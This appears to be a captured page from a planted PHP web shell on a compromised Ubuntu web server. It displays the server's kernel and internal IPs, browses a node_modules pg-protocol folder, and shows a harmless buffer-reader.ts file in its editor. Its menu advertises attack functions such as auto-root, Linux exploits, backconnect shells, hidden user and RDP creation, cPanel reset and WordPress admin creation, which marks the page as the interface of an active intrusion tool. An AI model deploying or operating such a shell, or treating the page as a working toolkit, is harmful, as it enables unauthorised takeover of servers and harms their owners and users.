Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
pg-protocol /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
testing
[ DIR ]
drwxrwxr-x
types
[ DIR ]
drwxrwxr-x
b.ts
562
B
-rw-rw-r--
buffer-reader.ts
1.24
KB
-rw-rw-r--
buffer-writer.ts
2.43
KB
-rw-rw-r--
inbound-parser.test.ts
14.67
KB
-rw-rw-r--
index.ts
459
B
-rw-rw-r--
messages.ts
6.18
KB
-rw-rw-r--
outbound-serializer.test.ts
8.25
KB
-rw-rw-r--
parser.ts
13.11
KB
-rw-rw-r--
serializer.ts
7.02
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : buffer-reader.ts
const emptyBuffer = Buffer.allocUnsafe(0) export class BufferReader { private buffer: Buffer = emptyBuffer // TODO(bmc): support non-utf8 encoding? private encoding: string = 'utf-8' constructor(private offset: number = 0) {} public setBuffer(offset: number, buffer: Buffer): void { this.offset = offset this.buffer = buffer } public int16(): number { const result = this.buffer.readInt16BE(this.offset) this.offset += 2 return result } public byte(): number { const result = this.buffer[this.offset] this.offset++ return result } public int32(): number { const result = this.buffer.readInt32BE(this.offset) this.offset += 4 return result } public string(length: number): string { const result = this.buffer.toString(this.encoding, this.offset, this.offset + length) this.offset += length return result } public cstring(): string { const start = this.offset let end = start while (this.buffer[end++] !== 0) {} this.offset = end return this.buffer.toString(this.encoding, start, end - 1) } public bytes(length: number): Buffer { const result = this.buffer.slice(this.offset, this.offset + length) this.offset += length return result } }
Close